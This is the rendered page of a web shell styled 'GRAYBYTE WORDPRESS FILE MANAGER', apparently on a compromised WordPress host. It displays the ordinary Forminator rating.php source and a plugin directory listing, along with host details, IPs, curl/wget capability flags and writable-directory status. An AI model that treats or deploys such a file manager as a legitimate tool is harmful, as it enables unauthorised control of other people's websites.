✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.217.6
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/tdhomesa/public_html/wp-content/plugins/forminator/library/fields//rating.php
<?php
/**
 * The Forminator_Rating class.
 *
 * @package Forminator
 */

if ( ! defined( 'ABSPATH' ) ) {
	die();
}

/**
 * Class Forminator_Rating
 *
 * @property  array field
 * @since 1.32
 */
class Forminator_Rating extends Forminator_Field {

	/**
	 * Slug
	 *
	 * @var string
	 */
	public $slug = 'rating';

	/**
	 * Type
	 *
	 * @var string
	 */
	public $type = 'rating';

	/**
	 * Position
	 *
	 * @var int
	 */
	public $position = 28;

	/**
	 * Options
	 *
	 * @var string
	 */
	public $options = array();

	/**
	 * Icon
	 *
	 * @var string
	 */
	public $icon = 'sui-icon-star';

	/**
	 * Forminator_Rating constructor.
	 */
	public function __construct() {
		parent::__construct();

		$this->name = esc_html__( 'Rating', 'forminator' );
		$required   = __( 'This field is required. Please select a rating.', 'forminator' );

		self::$default_required_messages[ $this->type ] = $required;
	}

	/**
	 * Field defaults
	 *
	 * @return array
	 * @since 1.32.0
	 */
	public function defaults(): array {
		return array(
			'validation'  => false,
			'field_label' => esc_html__( 'Rating', 'forminator' ),
			'max_rating'  => 5,
			'suffix'      => true,
			'icon'        => 'star',
			'size'        => 'md',
		);
	}

	/**
	 * Autofill Setting
	 *
	 * @param array $settings Settings.
	 *
	 * @return array
	 * @since 1.32.0
	 */
	public function autofill_settings( $settings = array() ): array {
		return array();
	}

	/**
	 * Field front-end markup
	 *
	 * @param array                  $field Field.
	 * @param Forminator_Render_Form $views_obj Forminator_Render_Form object.
	 * @param array|null             $draft_value Draft value(s).
	 *
	 * @return string
	 * @since 1.32
	 */
	public function markup( $field, $views_obj, $draft_value = array() ): string {
		$this->field = $field;
		$name        = self::get_property( 'element_id', $field );
		$id          = self::get_field_id( $name );
		$required    = self::get_property( 'required', $field, false );
		$label       = self::get_property( 'field_label', $field );
		$description = self::get_property( 'description', $field );
		$icon        = self::get_property( 'icon', $field, 'star' );
		$size        = self::get_property( 'size', $field, 'md' );
		$max_rating  = self::get_property( 'max_rating', $field, 5 );
		$suffix      = self::get_property( 'suffix', $field, true );
		$settings    = $views_obj->model->settings;

		$descr_position = self::get_description_position( $field, $settings );

		$value = 0;
		if ( isset( $draft_value['value'] ) ) {
			$rating_value = explode( '/', $draft_value['value'] )[0] ?? 0;
			$value        = esc_html( $rating_value );
		}

		$attributes = array(
			'name'              => $name,
			'id'                => $id,
			'class'             => 'forminator-rating',
			'aria-errormessage' => $id . '-error',
			'data-type'         => $icon,
			'data-size'         => $size,
			'data-suffix'       => $suffix ? 'true' : 'false',
		);

		if ( ! empty( $description ) ) {
			$attributes['aria-describedby'] = $id . '-description';
		}

		$options = array(
			array(
				'value'    => 0,
				'label'    => 0,
				'disabled' => true,
			),
		);

		$maximum_rating = max( 0, min( $max_rating, 50 ) );
		for ( $rating = 1; $rating <= $maximum_rating; $rating++ ) {
			$options[] = array(
				'value'    => $rating,
				'label'    => $rating,
				'disabled' => false,
			);
		}

		$html = '<div class="forminator-field">';

		$html .= self::create_select(
			$attributes,
			$label,
			$options,
			$value,
			$description,
			$required,
			$descr_position,
		);

		$html .= '</div>';

		return apply_filters( 'forminator_field_rating_markup', $html, $field );
	}

	/**
	 * Return field inline validation rules
	 *
	 * @return string
	 * @since 1.32
	 */
	public function get_validation_rules(): string {
		$field = $this->field;
		$rules = '"' . $this->get_id( $field ) . '": {' . "\n";
		if ( $this->is_required( $field ) ) {
			$rules .= '"required": true,';
		}

		$rules .= '},' . "\n";

		return apply_filters( 'forminator_field_rating_validation_rules', $rules, $this->get_id( $field ), $field );
	}

	/**
	 * Return field inline validation errors
	 *
	 * @return string
	 * @since 1.32
	 */
	public function get_validation_messages(): string {
		$message = '';
		$field   = $this->field;
		if ( $this->is_required( $field ) ) {
			$required_message = self::get_property( 'required_message', $field, self::$default_required_messages[ $this->type ] );
			$required_message = apply_filters(
				'forminator_rating_field_required_validation_message',
				$required_message,
				$this->get_id( $field ),
				$field
			);

			$message = '"' . $this->get_id( $field ) . '": {"required":"' . forminator_addcslashes( $required_message ) . '"},' . "\n";
		}

		return $message;
	}

	/**
	 * Field back-end validation
	 *
	 * @param array        $field Field settings.
	 * @param array|string $data Data to validate.
	 *
	 * @return bool
	 */
	public function validate( $field, $data ): bool {
		$id           = self::get_property( 'element_id', $field );
		$rating_value = explode( '/', $data )[0] ?? 0;
		if ( $this->is_required( $field ) ) {
			$required_error_message =
				$this->get_field_multiple_required_message(
					$id,
					$field,
					'required_message',
					'',
					esc_html( self::$default_required_messages[ $this->type ] )
				);

			if ( empty( $rating_value ) ) {
				$this->validation_message[ $id ] = $required_error_message;

				return false;
			}
		}

		return true;
	}

	/**
	 * Sanitize field value
	 *
	 * @param array        $field Field settings.
	 * @param array|string $data Data to sanitize.
	 *
	 * @return string
	 */
	public function sanitize( $field, $data ): string {
		// Sanitize.
		return esc_html( $data );
	}
}


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
20 Aug 2025 10.03 AM
tdhomesa / tdhomesa
0755
address.php
27.192 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
calculation.php
8.076 KB
3 Mar 2025 4.08 PM
tdhomesa / tdhomesa
0644
captcha.php
9.159 KB
14 Apr 2025 2.55 PM
tdhomesa / tdhomesa
0644
consent.php
6.063 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
currency.php
12.942 KB
18 Aug 2025 3.48 PM
tdhomesa / tdhomesa
0644
custom.php
7.134 KB
3 Mar 2025 4.08 PM
tdhomesa / tdhomesa
0644
date.php
44.481 KB
18 Aug 2025 3.48 PM
tdhomesa / tdhomesa
0644
email.php
14.274 KB
18 Aug 2025 3.48 PM
tdhomesa / tdhomesa
0644
gdprcheckbox.php
5.305 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
group.php
7.063 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
hidden.php
4.893 KB
14 Apr 2025 2.55 PM
tdhomesa / tdhomesa
0644
html.php
2.412 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
multivalue.php
16.597 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
name.php
22.025 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
number.php
13.171 KB
18 Aug 2025 3.48 PM
tdhomesa / tdhomesa
0644
page-break.php
1.479 KB
24 Dec 2024 8.31 PM
tdhomesa / tdhomesa
0644
password.php
18.627 KB
18 Aug 2025 3.48 PM
tdhomesa / tdhomesa
0644
paypal.php
13.385 KB
24 Dec 2024 8.31 PM
tdhomesa / tdhomesa
0644
phone.php
15.398 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
postdata.php
35.895 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
radio.php
17.066 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
rating.php
5.614 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
section.php
3.119 KB
24 Dec 2024 8.31 PM
tdhomesa / tdhomesa
0644
select.php
23.246 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
slider.php
14.014 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
stripe-payment-element.php
3.98 KB
14 Apr 2025 2.55 PM
tdhomesa / tdhomesa
0644
stripe.php
45.783 KB
18 Aug 2025 3.48 PM
tdhomesa / tdhomesa
0644
text.php
11.221 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
textarea.php
11.608 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644
time.php
28.9 KB
18 Aug 2025 3.48 PM
tdhomesa / tdhomesa
0644
upload.php
33.154 KB
18 Aug 2025 3.48 PM
tdhomesa / tdhomesa
0644
website.php
8.129 KB
14 Jul 2025 3.42 PM
tdhomesa / tdhomesa
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF